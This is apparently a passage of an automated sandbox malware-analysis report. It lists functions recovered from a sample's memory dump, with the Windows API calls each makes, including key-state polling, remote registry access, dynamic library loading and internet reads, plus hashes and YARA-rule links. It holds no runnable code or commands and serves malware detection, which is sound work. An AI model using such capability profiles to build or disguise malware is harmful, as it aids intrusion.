                                        • API String ID: 3488606520-0
                                        • Opcode ID: b44eb1059cd1f5622548c791dd634ced4f1c42488d2f16c4890978b54ca26c27
                                        • Instruction ID: 4556762a69a637d8815d9ce6189f55881cab6aa71074f47a6e1d0925127ed8ba
                                        • Opcode Fuzzy Hash: b44eb1059cd1f5622548c791dd634ced4f1c42488d2f16c4890978b54ca26c27
                                        • Instruction Fuzzy Hash: 07A1A0716043019FD720DF24C886F2AB7E5AF84714F14885DFA6A9B2D2D7B0ED45CB92
                                        Function 00C2BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C93700), ref: 00C2BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC1270,000000FF,?,0000003F,00000000,?), ref: 00C2BC36
                                        • _free.LIBCMT ref: 00C2BB7F
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: ab083b5963c14063d61cba436eb60502a62f0c16a4f07b27738f5ffb3a9d62ed
                                        • Instruction ID: 932b9603af140bc6034646f4a95da9ea5a26b5399296dc82079d95d2f6bd1560
                                        • Opcode Fuzzy Hash: ab083b5963c14063d61cba436eb60502a62f0c16a4f07b27738f5ffb3a9d62ed
                                        • Instruction Fuzzy Hash: 97511A71900229AFCB10EF65EC81FAEB7BCEF45320F14426AE424D75A2EB709E419B50
                                        Function 00C5E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5CF22,?), ref: 00C5DDFD
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5CF22,?), ref: 00C5DE16
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C5E473
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5E4AC
                                        • _wcslen.LIBCMT ref: 00C5E5EB
                                        • _wcslen.LIBCMT ref: 00C5E603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C5E650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: b800243653ec2198748931ce3f1a9c5f39d76c9e6b0e708e33b2f5a97fe771cb
                                        • Instruction ID: e21ce323d698410262029c63d3ff5c0574e2bc844f08c2449f9e17448af27d55
                                        • Opcode Fuzzy Hash: b800243653ec2198748931ce3f1a9c5f39d76c9e6b0e708e33b2f5a97fe771cb
                                        • Instruction Fuzzy Hash: 2B5140B24083459BC728EB90D881ADF73ECAF85341F40491EFA9993151EF74A7CC976A
                                        Function 00C7B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7BAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7BB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C7BB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00C7BBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7BBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: 09dbbb9b22b58205c941de61a65d9beb5e20dd9c6f750425a83aa272c2e041d2
                                        • Instruction ID: f1b5c95ee4f2d9df91b22c4f6ef442b638bd84845bf5705872d5857039cf7644
                                        • Opcode Fuzzy Hash: 09dbbb9b22b58205c941de61a65d9beb5e20dd9c6f750425a83aa272c2e041d2
                                        • Instruction Fuzzy Hash: 40618E31208245AFD314DF14C491F2ABBE5FF84358F1485ADF5998B2A2DB31ED49CB92
                                        Function 00C58BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C58BCD
                                        • VariantClear.OLEAUT32 ref: 00C58C3E
                                        • VariantClear.OLEAUT32 ref: 00C58C9D
                                        • VariantClear.OLEAUT32(?), ref: 00C58D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C58D3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        • String ID:
                                        • API String ID: 4136290138-0
                                        • Opcode ID: 497f2c0087b95863200338533f8c4db979224ba912283722eab83076b6d30b00
                                        • Instruction ID: a34206e7ac59a73e1d50d4c2387bb3904dd62f81d5eae3c60a56259231f80698
                                        • Opcode Fuzzy Hash: 497f2c0087b95863200338533f8c4db979224ba912283722eab83076b6d30b00
                                        • Instruction Fuzzy Hash: F9516BB5A0021AEFCB10CF58C884AAAB7F4FF89310B158559ED15EB350E730E955CFA4
                                        Function 00C68AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C68BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C68BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C68C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C68C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C68C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: bc17b06cdcc2960029cec4b5bd12e31ee5170ecbc145113da9f6e4dcbed4170b
                                        • Instruction ID: 15b707721c79e3fdec13b6d2e9b41813f11a869d19ddcf8bf4c85941c54b5bc4
                                        • Opcode Fuzzy Hash: bc17b06cdcc2960029cec4b5bd12e31ee5170ecbc145113da9f6e4dcbed4170b
                                        • Instruction Fuzzy Hash: 40516135A00219AFCB10DF54C890E6DBBF5FF48314F048098E949AB3A2CB31ED49CB90
                                        Function 00C78EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C78F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C78FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C78FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C79032
                                        • FreeLibrary.KERNEL32(00000000), ref: 00C79052
                                          • Part of subcall function 00C0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C61043,?,7529E610), ref: 00C0F6E6
                                          • Part of subcall function 00C0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C4FA64,00000000,00000000,?,?,00C61043,?,7529E610,?,00C4FA64), ref: 00C0F70D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        • String ID:
                                        • API String ID: 666041331-0
                                        • Opcode ID: 8d9627badbe13db94d7856afc9efab8e4513560fd5fdf0f9def145abda9bc21f
                                        • Instruction ID: 37547ebf3527c5a6e6ce068510c42a09ffc0ed99c20d1f38c003be3e81991f5d
                                        • Opcode Fuzzy Hash: 8d9627badbe13db94d7856afc9efab8e4513560fd5fdf0f9def145abda9bc21f
                                        • Instruction Fuzzy Hash: 39510935604205DFCB15DF59C494DADBBF1FF49314B0480A9E91A9B362DB31EE89CB90
                                        Function 00C86B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C86C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00C86C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C86C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C6AB79,00000000,00000000), ref: 00C86C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C86CC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        • String ID:
                                        • API String ID: 3688381893-0
                                        • Opcode ID: 4fb68d4c7df28c92911a1a67a981e46d52f53325a60f766007dc113baa9b6f1a
                                        • Instruction ID: 57176e636fe92004de2c4f46cb7abc7034336a7496e3d7ad3a9f343806082b61
                                        • Opcode Fuzzy Hash: 4fb68d4c7df28c92911a1a67a981e46d52f53325a60f766007dc113baa9b6f1a
                                        • Instruction Fuzzy Hash: D541E635600104AFDB24EF29CC94FB97BA5EB09368F140228F8A5A73E0C371EE40DB58
                                        Function 00C22051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 03ce8edecc83541986124a0abb8a1badf2473d08248ba033ff953cd5a64ae0f1
                                        • Instruction ID: 6719b03b0d3e3d8ca38d5f0cf9eba738fb5db34c0827d838f0fbd6fd55111294
                                        • Opcode Fuzzy Hash: 03ce8edecc83541986124a0abb8a1badf2473d08248ba033ff953cd5a64ae0f1
                                        • Instruction Fuzzy Hash: 9A41F632A00210AFCB24DF78D881A5DB7F5EF89714F154569E616EB792DB31EE01DB80
                                        Function 00C0912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00C09141
                                        • ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                        • GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: a80166511094862f82aaf6684770f49f46b3d4735d69d437b6804552dd7d7c54
                                        • Instruction ID: 0f430fc252d9936ff017beddd9e5a2eb62b3ec21da31be4f368ec604bc3e3780
                                        • Opcode Fuzzy Hash: a80166511094862f82aaf6684770f49f46b3d4735d69d437b6804552dd7d7c54
                                        • Instruction Fuzzy Hash: A3414C71A0861AFBDF159F64C848BEEB774FF05324F208329E429A72E1C7346A50DB91
                                        Function 00C63874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 00C638CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C63922
                                        • TranslateMessage.USER32(?), ref: 00C6394B
                                        • DispatchMessageW.USER32(?), ref: 00C63955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C63966
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: ad7d787726811187e23cf01594b07307520c5fea303f2a769057218c7de03a2b
                                        • Instruction ID: 82b8ea40c0b52a4f1c14a749fc06e08e7a7572ea381d58fb1c73f74e959fdbee
                                        • Opcode Fuzzy Hash: ad7d787726811187e23cf01594b07307520c5fea303f2a769057218c7de03a2b
                                        • Instruction Fuzzy Hash: A43188705083C19EEB35CB35D8C8FBA37A4EB06314F180559D872861E1D7B49785DF21
                                        Function 00C6CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C6CF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00C6CF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 3191363074-0
                                        • Opcode ID: e0c3263b3cceb4a0620b23608c2142744badf3fe765bd7483bcbb9b3f68ea3a3
                                        • Instruction ID: f953dd9db45cc2b8b2d33334708d9c5bebef5a0692cd4fbb2d86deb09166b6c4
                                        • Opcode Fuzzy Hash: e0c3263b3cceb4a0620b23608c2142744badf3fe765bd7483bcbb9b3f68ea3a3
                                        • Instruction Fuzzy Hash: E3311671A04205AFDB30DFE6D8C4ABABBFAEB14351B10442EF566D2151DB30AE41DBA1
                                        Function 00C51901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00C51915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C519C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00C519C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C519DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C519E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 1e573bae45fae31725f734895ccbd2390e901543b137f2fc70fa1b9626e1f88e
                                        • Instruction ID: 629b3f6084aa37b50679e13963ac77778d65f2ff362f48b4f85906a5fa4e86be
                                        • Opcode Fuzzy Hash: 1e573bae45fae31725f734895ccbd2390e901543b137f2fc70fa1b9626e1f88e
                                        • Instruction Fuzzy Hash: 2631AF75900219EFCB00CFA8C99DBDE7BB5EB45315F144229FD21A72D1C7709A98CB94
                                        Function 00C85706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C85745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C8579D
                                        • _wcslen.LIBCMT ref: 00C857AF
                                        • _wcslen.LIBCMT ref: 00C857BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C85816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: ffaf77c2c1c52cf0c19bff1b68260840eabf8407bb211c5084fe775bebaebcda
                                        • Instruction ID: 4e5af66400949dfa13cd7320327935575e59403f0d261375e25e74daad2599eb
                                        • Opcode Fuzzy Hash: ffaf77c2c1c52cf0c19bff1b68260840eabf8407bb211c5084fe775bebaebcda
                                        • Instruction Fuzzy Hash: F421A9759145189ADB10AF61CC84AED777CFF45328F108116F929DA1D0D7B09685CF58
                                        Function 00C70930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 00C70951
                                        • GetForegroundWindow.USER32 ref: 00C70968
                                        • GetDC.USER32(00000000), ref: 00C709A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00C709B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 00C709E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 2fc5439ed8f096876a640dad0ae2079f7923bc349554602d47be19c43509cde1
                                        • Instruction ID: 361d66ca6754e751d141b78541f476a563c693001e760b98df79c154580871aa
                                        • Opcode Fuzzy Hash: 2fc5439ed8f096876a640dad0ae2079f7923bc349554602d47be19c43509cde1
                                        • Instruction Fuzzy Hash: E2218E35600204EFD714EF65D998BAEBBE9EF48700F14806DF95A97362DB34AD04DB60
                                        Function 00C2CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 00C2CDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2CDE9
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C2CE0F
                                        • _free.LIBCMT ref: 00C2CE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C2CE31
                                        Memory Dump Source
